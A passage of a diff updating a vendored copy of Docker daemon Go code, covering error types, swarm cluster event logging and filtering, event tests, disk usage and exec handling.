tv := volumeToAPIType(v) - sz, err := directory.Size(v.Path()) - if err != nil { - logrus.Warnf("failed to determine size of 
volume %v", name) - sz = -1 - } - tv.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(len(refs))} - allVolumes = append(allVolumes, tv) - - return nil - } - - err = daemon.traverseLocalVolumes(getLocalVols) + localVolumes, err := daemon.volumes.LocalVolumesSize(ctx) if err != nil { return nil, err } - // Get total layers size on disk - layerRefs := daemon.getLayerRefs() - allLayers := daemon.layerStore.Map() - var allLayersSize int64 - for _, l := range allLayers { - size, err := l.DiffSize() - if err == nil { - if _, ok := layerRefs[l.ChainID()]; ok { - allLayersSize += size - } else { - logrus.Warnf("found leaked image layer %v", l.ChainID()) - } - } else { - logrus.Warnf("failed to get diff size for layer %v", l.ChainID()) - } - + allLayersSize, err := daemon.imageService.LayerDiskUsage(ctx) + if err != nil { + return nil, err } return &types.DiskUsage{ LayersSize: allLayersSize, Containers: allContainers, - Volumes: allVolumes, + Volumes: localVolumes, Images: allImages, }, nil } diff --git a/vendor/github.com/docker/docker/daemon/errors.go b/vendor/github.com/docker/docker/daemon/errors.go index 566a32f175..6d02af3d54 100644 --- a/vendor/github.com/docker/docker/daemon/errors.go +++ b/vendor/github.com/docker/docker/daemon/errors.go @@ -1,57 +1,155 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "strings" + "syscall" - "github.com/docker/docker/api/errors" - "github.com/docker/docker/reference" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "google.golang.org/grpc" ) -func (d *Daemon) imageNotExistToErrcode(err error) error { - if dne, isDNE := err.(ErrImageDoesNotExist); isDNE { - if strings.Contains(dne.RefOrID, "@") { - e := fmt.Errorf("No such image: %s", dne.RefOrID) - return errors.NewRequestNotFoundError(e) - } - tag := reference.DefaultTag - ref, err := reference.ParseNamed(dne.RefOrID) - if err != nil { - e := fmt.Errorf("No such image: %s:%s", dne.RefOrID, tag) - return 
errors.NewRequestNotFoundError(e) - } - if tagged, isTagged := ref.(reference.NamedTagged); isTagged { - tag = tagged.Tag() - } - e := fmt.Errorf("No such image: %s:%s", ref.Name(), tag) - return errors.NewRequestNotFoundError(e) - } - return err +func errNotRunning(id string) error { + return errdefs.Conflict(errors.Errorf("Container %s is not running", id)) } -type errNotRunning struct { - containerID string +func containerNotFound(id string) error { + return objNotFoundError{"container", id} } -func (e errNotRunning) Error() string { - return fmt.Sprintf("Container %s is not running", e.containerID) +type objNotFoundError struct { + object string + id string } -func (e errNotRunning) ContainerIsRunning() bool { - return false +func (e objNotFoundError) Error() string { + return "No such " + e.object + ": " + e.id } +func (e objNotFoundError) NotFound() {} + func errContainerIsRestarting(containerID string) error { - err := fmt.Errorf("Container %s is restarting, wait until the container is running", containerID) - return errors.NewRequestConflictError(err) + cause := errors.Errorf("Container %s is restarting, wait until the container is running", containerID) + return errdefs.Conflict(cause) } func errExecNotFound(id string) error { - err := fmt.Errorf("No such exec instance '%s' found in daemon", id) - return errors.NewRequestNotFoundError(err) + return objNotFoundError{"exec instance", id} } func errExecPaused(id string) error { - err := fmt.Errorf("Container %s is paused, unpause the container before exec", id) - return errors.NewRequestConflictError(err) + cause := errors.Errorf("Container %s is paused, unpause the container before exec", id) + return errdefs.Conflict(cause) +} + +func errNotPaused(id string) error { + cause := errors.Errorf("Container %s is already paused", id) + return errdefs.Conflict(cause) +} + +type nameConflictError struct { + id string + name string +} + +func (e nameConflictError) Error() string { + return fmt.Sprintf("Conflict. 
The container name %q is already in use by container %q. You have to remove (or rename) that container to be able to reuse that name.", e.name, e.id) +} + +func (nameConflictError) Conflict() {} + +type containerNotModifiedError struct { + running bool +} + +func (e containerNotModifiedError) Error() string { + if e.running { + return "Container is already started" + } + return "Container is already stopped" +} + +func (e containerNotModifiedError) NotModified() {} + +type invalidIdentifier string + +func (e invalidIdentifier) Error() string { + return fmt.Sprintf("invalid name or ID supplied: %q", string(e)) +} + +func (invalidIdentifier) InvalidParameter() {} + +type duplicateMountPointError string + +func (e duplicateMountPointError) Error() string { + return "Duplicate mount point: " + string(e) +} +func (duplicateMountPointError) InvalidParameter() {} + +type containerFileNotFound struct { + file string + container string +} + +func (e containerFileNotFound) Error() string { + return "Could not find the file " + e.file + " in container " + e.container +} + +func (containerFileNotFound) NotFound() {} + +type invalidFilter struct { + filter string + value interface{} +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if e.value != nil { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (e invalidFilter) InvalidParameter() {} + +type startInvalidConfigError string + +func (e startInvalidConfigError) Error() string { + return string(e) +} + +func (e startInvalidConfigError) InvalidParameter() {} // Is this right??? 
+ +func translateContainerdStartErr(cmd string, setExitCode func(int), err error) error { + errDesc := grpc.ErrorDesc(err) + contains := func(s1, s2 string) bool { + return strings.Contains(strings.ToLower(s1), s2) + } + var retErr = errdefs.Unknown(errors.New(errDesc)) + // if we receive an internal error from the initial start of a container then lets + // return it instead of entering the restart loop + // set to 127 for container cmd not found/does not exist) + if contains(errDesc, cmd) && + (contains(errDesc, "executable file not found") || + contains(errDesc, "no such file or directory") || + contains(errDesc, "system cannot find the file specified")) { + setExitCode(127) + retErr = startInvalidConfigError(errDesc) + } + // set to 126 for container cmd can't be invoked errors + if contains(errDesc, syscall.EACCES.Error()) { + setExitCode(126) + retErr = startInvalidConfigError(errDesc) + } + + // attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts + if contains(errDesc, syscall.ENOTDIR.Error()) { + errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? 
Check if the specified host path exists and is the expected type" + setExitCode(127) + retErr = startInvalidConfigError(errDesc) + } + + // TODO: it would be nice to get some better errors from containerd so we can return better errors here + return retErr } diff --git a/vendor/github.com/docker/docker/daemon/events.go b/vendor/github.com/docker/docker/daemon/events.go index 8fe8e1b640..cf1634a198 100644 --- a/vendor/github.com/docker/docker/daemon/events.go +++ b/vendor/github.com/docker/docker/daemon/events.go @@ -1,6 +1,8 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" + "strconv" "strings" "time" @@ -9,6 +11,17 @@ import ( "github.com/docker/docker/container" daemonevents "github.com/docker/docker/daemon/events" "github.com/docker/libnetwork" + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" + "github.com/sirupsen/logrus" +) + +var ( + clusterEventAction = map[swarmapi.WatchActionKind]string{ + swarmapi.WatchActionKindCreate: "create", + swarmapi.WatchActionKindUpdate: "update", + swarmapi.WatchActionKindRemove: "remove", + } ) // LogContainerEvent generates an event related to a container with only the default attributes. @@ -31,30 +44,6 @@ func (daemon *Daemon) LogContainerEventWithAttributes(container *container.Conta daemon.EventsService.Log(action, events.ContainerEventType, actor) } -// LogImageEvent generates an event related to an image with only the default attributes. -func (daemon *Daemon) LogImageEvent(imageID, refName, action string) { - daemon.LogImageEventWithAttributes(imageID, refName, action, map[string]string{}) -} - -// LogImageEventWithAttributes generates an event related to an image with specific given attributes. -func (daemon *Daemon) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) { - img, err := daemon.GetImage(imageID) - if err == nil && img.Config != nil { - // image has not been removed yet. 
- // it could be missing if the event is `delete`. - copyAttributes(attributes, img.Config.Labels) - } - if refName != "" { - attributes["name"] = refName - } - actor := events.Actor{ - ID: imageID, - Attributes: attributes, - } - - daemon.EventsService.Log(action, events.ImageEventType, actor) -} - // LogPluginEvent generates an event related to a plugin with only the default attributes. func (daemon *Daemon) LogPluginEvent(pluginID, refName, action string) { daemon.LogPluginEventWithAttributes(pluginID, refName, action, map[string]string{}) @@ -130,3 +119,190 @@ func copyAttributes(attributes, labels map[string]string) { attributes[k] = v } } + +// ProcessClusterNotifications gets changes from store and add them to event list +func (daemon *Daemon) ProcessClusterNotifications(ctx context.Context, watchStream chan *swarmapi.WatchMessage) { + for { + select { + case <-ctx.Done(): + return + case message, ok := <-watchStream: + if !ok { + logrus.Debug("cluster event channel has stopped") + return + } + daemon.generateClusterEvent(message) + } + } +} + +func (daemon *Daemon) generateClusterEvent(msg *swarmapi.WatchMessage) { + for _, event := range msg.Events { + if event.Object == nil { + logrus.Errorf("event without object: %v", event) + continue + } + switch v := event.Object.GetObject().(type) { + case *swarmapi.Object_Node: + daemon.logNodeEvent(event.Action, v.Node, event.OldObject.GetNode()) + case *swarmapi.Object_Service: + daemon.logServiceEvent(event.Action, v.Service, event.OldObject.GetService()) + case *swarmapi.Object_Network: + daemon.logNetworkEvent(event.Action, v.Network, event.OldObject.GetNetwork()) + case *swarmapi.Object_Secret: + daemon.logSecretEvent(event.Action, v.Secret, event.OldObject.GetSecret()) + case *swarmapi.Object_Config: + daemon.logConfigEvent(event.Action, v.Config, event.OldObject.GetConfig()) + default: + logrus.Warnf("unrecognized event: %v", event) + } + } +} + +func (daemon *Daemon) logNetworkEvent(action 
swarmapi.WatchActionKind, net *swarmapi.Network, oldNet *swarmapi.Network) { + attributes := map[string]string{ + "name": net.Spec.Annotations.Name, + } + eventTime := eventTimestamp(net.Meta, action) + daemon.logClusterEvent(action, net.ID, "network", attributes, eventTime) +} + +func (daemon *Daemon) logSecretEvent(action swarmapi.WatchActionKind, secret *swarmapi.Secret, oldSecret *swarmapi.Secret) { + attributes := map[string]string{ + "name": secret.Spec.Annotations.Name, + } + eventTime := eventTimestamp(secret.Meta, action) + daemon.logClusterEvent(action, secret.ID, "secret", attributes, eventTime) +} + +func (daemon *Daemon) logConfigEvent(action swarmapi.WatchActionKind, config *swarmapi.Config, oldConfig *swarmapi.Config) { + attributes := map[string]string{ + "name": config.Spec.Annotations.Name, + } + eventTime := eventTimestamp(config.Meta, action) + daemon.logClusterEvent(action, config.ID, "config", attributes, eventTime) +} + +func (daemon *Daemon) logNodeEvent(action swarmapi.WatchActionKind, node *swarmapi.Node, oldNode *swarmapi.Node) { + name := node.Spec.Annotations.Name + if name == "" && node.Description != nil { + name = node.Description.Hostname + } + attributes := map[string]string{ + "name": name, + } + eventTime := eventTimestamp(node.Meta, action) + // In an update event, display the changes in attributes + if action == swarmapi.WatchActionKindUpdate && oldNode != nil { + if node.Spec.Availability != oldNode.Spec.Availability { + attributes["availability.old"] = strings.ToLower(oldNode.Spec.Availability.String()) + attributes["availability.new"] = strings.ToLower(node.Spec.Availability.String()) + } + if node.Role != oldNode.Role { + attributes["role.old"] = strings.ToLower(oldNode.Role.String()) + attributes["role.new"] = strings.ToLower(node.Role.String()) + } + if node.Status.State != oldNode.Status.State { + attributes["state.old"] = strings.ToLower(oldNode.Status.State.String()) + attributes["state.new"] = 
strings.ToLower(node.Status.State.String()) + } + // This handles change within manager role + if node.ManagerStatus != nil && oldNode.ManagerStatus != nil { + // leader change + if node.ManagerStatus.Leader != oldNode.ManagerStatus.Leader { + if node.ManagerStatus.Leader { + attributes["leader.old"] = "false" + attributes["leader.new"] = "true" + } else { + attributes["leader.old"] = "true" + attributes["leader.new"] = "false" + } + } + if node.ManagerStatus.Reachability != oldNode.ManagerStatus.Reachability { + attributes["reachability.old"] = strings.ToLower(oldNode.ManagerStatus.Reachability.String()) + attributes["reachability.new"] = strings.ToLower(node.ManagerStatus.Reachability.String()) + } + } + } + + daemon.logClusterEvent(action, node.ID, "node", attributes, eventTime) +} + +func (daemon *Daemon) logServiceEvent(action swarmapi.WatchActionKind, service *swarmapi.Service, oldService *swarmapi.Service) { + attributes := map[string]string{ + "name": service.Spec.Annotations.Name, + } + eventTime := eventTimestamp(service.Meta, action) + + if action == swarmapi.WatchActionKindUpdate && oldService != nil { + // check image + if x, ok := service.Spec.Task.GetRuntime().(*swarmapi.TaskSpec_Container); ok { + containerSpec := x.Container + if y, ok := oldService.Spec.Task.GetRuntime().(*swarmapi.TaskSpec_Container); ok { + oldContainerSpec := y.Container + if containerSpec.Image != oldContainerSpec.Image { + attributes["image.old"] = oldContainerSpec.Image + attributes["image.new"] = containerSpec.Image + } + } else { + // This should not happen. 
+ logrus.Errorf("service %s runtime changed from %T to %T", service.Spec.Annotations.Name, oldService.Spec.Task.GetRuntime(), service.Spec.Task.GetRuntime()) + } + } + // check replicated count change + if x, ok := service.Spec.GetMode().(*swarmapi.ServiceSpec_Replicated); ok { + replicas := x.Replicated.Replicas + if y, ok := oldService.Spec.GetMode().(*swarmapi.ServiceSpec_Replicated); ok { + oldReplicas := y.Replicated.Replicas + if replicas != oldReplicas { + attributes["replicas.old"] = strconv.FormatUint(oldReplicas, 10) + attributes["replicas.new"] = strconv.FormatUint(replicas, 10) + } + } else { + // This should not happen. + logrus.Errorf("service %s mode changed from %T to %T", service.Spec.Annotations.Name, oldService.Spec.GetMode(), service.Spec.GetMode()) + } + } + if service.UpdateStatus != nil { + if oldService.UpdateStatus == nil { + attributes["updatestate.new"] = strings.ToLower(service.UpdateStatus.State.String()) + } else if service.UpdateStatus.State != oldService.UpdateStatus.State { + attributes["updatestate.old"] = strings.ToLower(oldService.UpdateStatus.State.String()) + attributes["updatestate.new"] = strings.ToLower(service.UpdateStatus.State.String()) + } + } + } + daemon.logClusterEvent(action, service.ID, "service", attributes, eventTime) +} + +func (daemon *Daemon) logClusterEvent(action swarmapi.WatchActionKind, id, eventType string, attributes map[string]string, eventTime time.Time) { + actor := events.Actor{ + ID: id, + Attributes: attributes, + } + + jm := events.Message{ + Action: clusterEventAction[action], + Type: eventType, + Actor: actor, + Scope: "swarm", + Time: eventTime.UTC().Unix(), + TimeNano: eventTime.UTC().UnixNano(), + } + daemon.EventsService.PublishMessage(jm) +} + +func eventTimestamp(meta swarmapi.Meta, action swarmapi.WatchActionKind) time.Time { + var eventTime time.Time + switch action { + case swarmapi.WatchActionKindCreate: + eventTime, _ = gogotypes.TimestampFromProto(meta.CreatedAt) + case 
swarmapi.WatchActionKindUpdate: + eventTime, _ = gogotypes.TimestampFromProto(meta.UpdatedAt) + case swarmapi.WatchActionKindRemove: + // There is no timestamp from store message for remove operations. + // Use current time. + eventTime = time.Now() + } + return eventTime +} diff --git a/vendor/github.com/docker/docker/daemon/events/events.go b/vendor/github.com/docker/docker/daemon/events/events.go index 0bf105f54d..31af271fe6 100644 --- a/vendor/github.com/docker/docker/daemon/events/events.go +++ b/vendor/github.com/docker/docker/daemon/events/events.go @@ -1,4 +1,4 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import ( "sync" @@ -9,7 +9,7 @@ import ( ) const ( - eventsLimit = 64 + eventsLimit = 256 bufferSize = 1024 ) @@ -28,7 +28,7 @@ func New() *Events { } } -// Subscribe adds new listener to events, returns slice of 64 stored +// Subscribe adds new listener to events, returns slice of 256 stored // last events, a channel in which you can expect new events (in form // of interface{}, so you need type assertion), and a function to call // to stop the stream of events. @@ -46,7 +46,7 @@ func (e *Events) Subscribe() ([]eventtypes.Message, chan interface{}, func()) { return current, l, cancel } -// SubscribeTopic adds new listener to events, returns slice of 64 stored +// SubscribeTopic adds new listener to events, returns slice of 256 stored // last events, a channel in which you can expect new events (in form // of interface{}, so you need type assertion). func (e *Events) SubscribeTopic(since, until time.Time, ef *Filter) ([]eventtypes.Message, chan interface{}) { @@ -78,15 +78,14 @@ func (e *Events) Evict(l chan interface{}) { e.pub.Evict(l) } -// Log broadcasts event to listeners. Each listener has 100 millisecond for -// receiving event or it will be skipped. 
+// Log creates a local scope message and publishes it func (e *Events) Log(action, eventType string, actor eventtypes.Actor) { - eventsCounter.Inc() now := time.Now().UTC() jm := eventtypes.Message{ Action: action, Type: eventType, Actor: actor, + Scope: "local", Time: now.Unix(), TimeNano: now.UnixNano(), } @@ -102,6 +101,14 @@ func (e *Events) Log(action, eventType string, actor eventtypes.Actor) { jm.Status = action } + e.PublishMessage(jm) +} + +// PublishMessage broadcasts event to listeners. Each listener has 100 milliseconds to +// receive the event or it will be skipped. +func (e *Events) PublishMessage(jm eventtypes.Message) { + eventsCounter.Inc() + e.mu.Lock() if len(e.events) == cap(e.events) { // discard oldest event diff --git a/vendor/github.com/docker/docker/daemon/events/events_test.go b/vendor/github.com/docker/docker/daemon/events/events_test.go index bbd160f901..d11521567f 100644 --- a/vendor/github.com/docker/docker/daemon/events/events_test.go +++ b/vendor/github.com/docker/docker/daemon/events/events_test.go @@ -1,4 +1,4 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import ( "fmt" @@ -135,21 +135,28 @@ func TestLogEvents(t *testing.T) { t.Fatalf("Must be %d events, got %d", eventsLimit, len(current)) } first := current[0] - if first.Status != "action_16" { - t.Fatalf("First action is %s, must be action_16", first.Status) + + // TODO remove this once we removed the deprecated `ID`, `Status`, and `From` fields + if first.Action != first.Status { + // Verify that the (deprecated) Status is set to the expected value + t.Fatalf("Action (%s) does not match Status (%s)", first.Action, first.Status) + } + + if first.Action != "action_16" { + t.Fatalf("First action is %s, must be action_16", first.Action) } last := current[len(current)-1] - if last.Status != "action_79" { - t.Fatalf("Last action is %s, must be action_79", last.Status) + if last.Action != "action_271" { + t.Fatalf("Last action is %s, must be 
action_271", last.Action) } firstC := msgs[0] - if firstC.Status != "action_80" { - t.Fatalf("First action is %s, must be action_80", firstC.Status) + if firstC.Action != "action_272" { + t.Fatalf("First action is %s, must be action_272", firstC.Action) } lastC := msgs[len(msgs)-1] - if lastC.Status != "action_89" { - t.Fatalf("Last action is %s, must be action_89", lastC.Status) + if lastC.Action != "action_281" { + t.Fatalf("Last action is %s, must be action_281", lastC.Action) } } @@ -247,7 +254,7 @@ func TestLoadBufferedEventsOnlyFromPast(t *testing.T) { } // #13753 -func TestIngoreBufferedWhenNoTimes(t *testing.T) { +func TestIgnoreBufferedWhenNoTimes(t *testing.T) { m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") if err != nil { t.Fatal(err) diff --git a/vendor/github.com/docker/docker/daemon/events/filter.go b/vendor/github.com/docker/docker/daemon/events/filter.go index 5c9c527692..da06f18b06 100644 --- a/vendor/github.com/docker/docker/daemon/events/filter.go +++ b/vendor/github.com/docker/docker/daemon/events/filter.go @@ -1,9 +1,9 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import ( + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/reference" ) // Filter can filter out docker events from a stream @@ -20,12 +20,17 @@ func NewFilter(filter filters.Args) *Filter { func (ef *Filter) Include(ev events.Message) bool { return ef.matchEvent(ev) && ef.filter.ExactMatch("type", ev.Type) && + ef.matchScope(ev.Scope) && ef.matchDaemon(ev) && ef.matchContainer(ev) && ef.matchPlugin(ev) && ef.matchVolume(ev) && ef.matchNetwork(ev) && ef.matchImage(ev) && + ef.matchNode(ev) && + ef.matchService(ev) && + ef.matchSecret(ev) && + ef.matchConfig(ev) && ef.matchLabels(ev.Actor.Attributes) 
} @@ -47,8 +52,15 @@ func (ef *Filter) filterContains(field string, values map[string]struct{}) bool return false } +func (ef *Filter) matchScope(scope string) bool { + if !ef.filter.Contains("scope") { + return true + } + return ef.filter.ExactMatch("scope", scope) +} + func (ef *Filter) matchLabels(attributes map[string]string) bool { - if !ef.filter.Include("label") { + if !ef.filter.Contains("label") { return true } return ef.filter.MatchKVList("label", attributes) @@ -74,6 +86,22 @@ func (ef *Filter) matchNetwork(ev events.Message) bool { return ef.fuzzyMatchName(ev, events.NetworkEventType) } +func (ef *Filter) matchService(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.ServiceEventType) +} + +func (ef *Filter) matchNode(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.NodeEventType) +} + +func (ef *Filter) matchSecret(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.SecretEventType) +} + +func (ef *Filter) matchConfig(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.ConfigEventType) +} + func (ef *Filter) fuzzyMatchName(ev events.Message, eventType string) bool { return ef.filter.FuzzyMatch(eventType, ev.Actor.ID) || ef.filter.FuzzyMatch(eventType, ev.Actor.Attributes["name"]) @@ -102,9 +130,9 @@ func (ef *Filter) matchImage(ev events.Message) bool { } func stripTag(image string) string { - ref, err := reference.ParseNamed(image) + ref, err := reference.ParseNormalizedNamed(image) if err != nil { return image } - return ref.Name() + return reference.FamiliarName(ref) } diff --git a/vendor/github.com/docker/docker/daemon/events/metrics.go b/vendor/github.com/docker/docker/daemon/events/metrics.go index c9a89ec0ed..199858d6e0 100644 --- a/vendor/github.com/docker/docker/daemon/events/metrics.go +++ b/vendor/github.com/docker/docker/daemon/events/metrics.go @@ -1,4 +1,4 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import "github.com/docker/go-metrics" diff 
--git a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go index 3544446e18..b6766adb90 100644 --- a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go +++ b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go @@ -1,4 +1,4 @@ -package testutils +package testutils // import "github.com/docker/docker/daemon/events/testutils" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/events_test.go b/vendor/github.com/docker/docker/daemon/events_test.go index 2dbcc27dfc..df089976f2 100644 --- a/vendor/github.com/docker/docker/daemon/events_test.go +++ b/vendor/github.com/docker/docker/daemon/events_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" @@ -16,15 +16,13 @@ func TestLogContainerEventCopyLabels(t *testing.T) { defer e.Evict(l) container := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Image: "image_name", - Labels: map[string]string{ - "node": "1", - "os": "alpine", - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "node": "1", + "os": "alpine", }, }, } @@ -49,14 +47,12 @@ func TestLogContainerEventWithAttributes(t *testing.T) { defer e.Evict(l) container := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Labels: map[string]string{ - "node": "1", - "os": "alpine", - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Labels: map[string]string{ + "node": "1", + "os": "alpine", }, }, } @@ -89,6 +85,6 @@ func validateTestAttributes(t *testing.T, l chan interface{}, expectedAttributes } } case <-time.After(10 * time.Second): - 
t.Fatalf("LogEvent test timed out") + t.Fatal("LogEvent test timed out") } } diff --git a/vendor/github.com/docker/docker/daemon/exec.go b/vendor/github.com/docker/docker/daemon/exec.go index 8197426a33..f0b43d7253 100644 --- a/vendor/github.com/docker/docker/daemon/exec.go +++ b/vendor/github.com/docker/docker/daemon/exec.go @@ -1,24 +1,24 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "io" "strings" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/container" + "github.com/docker/docker/container/stream" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/term" - "github.com/docker/docker/utils" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Seconds to wait after sending TERM before trying KILL @@ -44,34 +44,34 @@ func (d *Daemon) ExecExists(name string) (bool, error) { // with the exec instance is stopped or paused, it will return an error. func (d *Daemon) getExecConfig(name string) (*exec.Config, error) { ec := d.execCommands.Get(name) + if ec == nil { + return nil, errExecNotFound(name) + } // If the exec is found but its container is not in the daemon's list of // containers then it must have been deleted, in which case instead of // saying the container isn't running, we should return a 404 so that // the user sees the same error now that they will after the // 5 minute clean-up loop is run which erases old/dead execs. 
- - if ec != nil { - if container := d.containers.Get(ec.ContainerID); container != nil { - if !container.IsRunning() { - return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String()) - } - if container.IsPaused() { - return nil, errExecPaused(container.ID) - } - if container.IsRestarting() { - return nil, errContainerIsRestarting(container.ID) - } - return ec, nil - } + container := d.containers.Get(ec.ContainerID) + if container == nil { + return nil, containerNotFound(name) } - - return nil, errExecNotFound(name) + if !container.IsRunning() { + return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String()) + } + if container.IsPaused() { + return nil, errExecPaused(container.ID) + } + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return ec, nil } func (d *Daemon) unregisterExecCommand(container *container.Container, execConfig *exec.Config) { - container.ExecCommands.Delete(execConfig.ID) - d.execCommands.Delete(execConfig.ID) + container.ExecCommands.Delete(execConfig.ID, execConfig.Pid) + d.execCommands.Delete(execConfig.ID, execConfig.Pid) } func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { @@ -81,7 +81,7 @@ func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { } if !container.IsRunning() { - return nil, errNotRunning{container.ID} + return nil, errNotRunning(container.ID) } if container.IsPaused() { return nil, errExecPaused(name) @@ -94,7 +94,7 @@ func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { // ContainerExecCreate sets up an exec in a running container. 
func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (string, error) { - container, err := d.getActiveContainer(name) + cntr, err := d.getActiveContainer(name) if err != nil { return "", err } @@ -115,26 +115,33 @@ func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (str execConfig.OpenStdin = config.AttachStdin execConfig.OpenStdout = config.AttachStdout execConfig.OpenStderr = config.AttachStderr - execConfig.ContainerID = container.ID + execConfig.ContainerID = cntr.ID execConfig.DetachKeys = keys execConfig.Entrypoint = entrypoint execConfig.Args = args execConfig.Tty = config.Tty execConfig.Privileged = config.Privileged execConfig.User = config.User + execConfig.WorkingDir = config.WorkingDir - linkedEnv, err := d.setupLinkedContainers(container) + linkedEnv, err := d.setupLinkedContainers(cntr) if err != nil { return "", err } - execConfig.Env = utils.ReplaceOrAppendEnvValues(container.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env) + execConfig.Env = container.ReplaceOrAppendEnvValues(cntr.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env) if len(execConfig.User) == 0 { - execConfig.User = container.Config.User + execConfig.User = cntr.Config.User + } + if len(execConfig.WorkingDir) == 0 { + execConfig.WorkingDir = cntr.Config.WorkingDir } - d.registerExecCommand(container, execConfig) + d.registerExecCommand(cntr, execConfig) - d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + attributes := map[string]string{ + "execID": execConfig.ID, + } + d.LogContainerEventWithAttributes(cntr, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "), attributes) return execConfig.ID, nil } @@ -142,7 +149,7 @@ func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (str // ContainerExecStart starts a previously set up exec instance. The // std streams are set up. 
// If ctx is cancelled, the process is terminated. -func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) (err error) { +func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.Reader, stdout io.Writer, stderr io.Writer) (err error) { var ( cStdin io.ReadCloser cStdout, cStderr io.Writer @@ -157,26 +164,36 @@ func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.R if ec.ExitCode != nil { ec.Unlock() err := fmt.Errorf("Error: Exec command %s has already run", ec.ID) - return errors.NewRequestConflictError(err) + return errdefs.Conflict(err) } if ec.Running { ec.Unlock() - return fmt.Errorf("Error: Exec command %s is already running", ec.ID) + return errdefs.Conflict(fmt.Errorf("Error: Exec command %s is already running", ec.ID)) } ec.Running = true + ec.Unlock() + + c := d.containers.Get(ec.ContainerID) + logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID) + attributes := map[string]string{ + "execID": ec.ID, + } + d.LogContainerEventWithAttributes(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " "), attributes) + defer func() { if err != nil { + ec.Lock() ec.Running = false exitCode := 126 ec.ExitCode = &exitCode + if err := ec.CloseStreams(); err != nil { + logrus.Errorf("failed to cleanup exec %s streams: %s", c.ID, err) + } + ec.Unlock() + c.ExecCommands.Delete(ec.ID, ec.Pid) } }() - ec.Unlock() - - c := d.containers.Get(ec.ContainerID) - logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID) - d.LogContainerEvent(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " ")) if ec.OpenStdin && stdin != nil { r, w := io.Pipe() @@ -200,44 +217,71 @@ func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.R ec.StreamConfig.NewNopInputPipe() } - p := libcontainerd.Process{ + p := &specs.Process{ Args: append([]string{ec.Entrypoint}, ec.Args...), Env: ec.Env, Terminal: ec.Tty, + 
